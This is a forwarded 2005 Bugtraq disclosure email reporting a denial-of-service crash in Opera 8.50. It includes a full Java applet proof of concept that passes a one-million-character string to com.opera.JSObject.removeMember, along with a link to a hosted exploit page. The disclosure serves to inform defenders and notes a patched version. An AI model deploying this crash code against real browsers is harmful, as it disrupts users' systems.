Hello Lukas,
we have another one.

Date: Wed, 30 Nov 2005 00:31:29 +0100
From: Marc Schoenefeld <marc.schoenefeld@gmx.org>
User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716)
To: Bugtraq <bugtraq@securityfocus.com>
Subject: Opera 8.50 DoS with simple java applet
Envelope-To: tom@electric-sheep.org

Hi y'all,

it is possible to crash the opera 8.50 browser with a simple
java applet (see below).
This was observed on Win32, Linux versions maybe affected, too.
This can be tested only at:

http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

As you can see the applet crashes at 0x67c0a54c. This is
caused by a bug in a JNI routine implementing the com.opera.JSObject class.
It cannot be ruled out, that this bug is exploitable.

The opera guys were informed on the 21st of September, and
then again on 8th of October.

Please upgrade to the new Opera 8.51, which does not expose this
weakness.

Sincerely
Marc Schönefeld
marc@illegalaccess.org


>import java.applet.Applet;
>import java.awt.Graphics;
>
>import netscape.javascript.JSObject;
>
>public class OperaTest extends Applet{
>        static {
>        System.out.println("Loaded 1.2");
>    }
>        public void paint(Graphics g) {
>        System.out.println("start");
>        try {
>        netscape.javascript.JSObject jso = JSObject.getWindow(this);
>        System.out.println(jso.getClass());
>        com.opera.JSObject j = (com.opera.JSObject ) jso;
>        char[] x = new char[1000000];
>                for (int y = 0 ; y < x.length; y++) {
>            x [y] = 'A';
>        }
>        String z = new String(x);
>                    System.out.println("after evalb");
>        j.removeMember(z);
>        System.out.println("after remove");
>        }
>        catch (Exception e) {
>            e.printStackTrace();
>        }
>    }
>}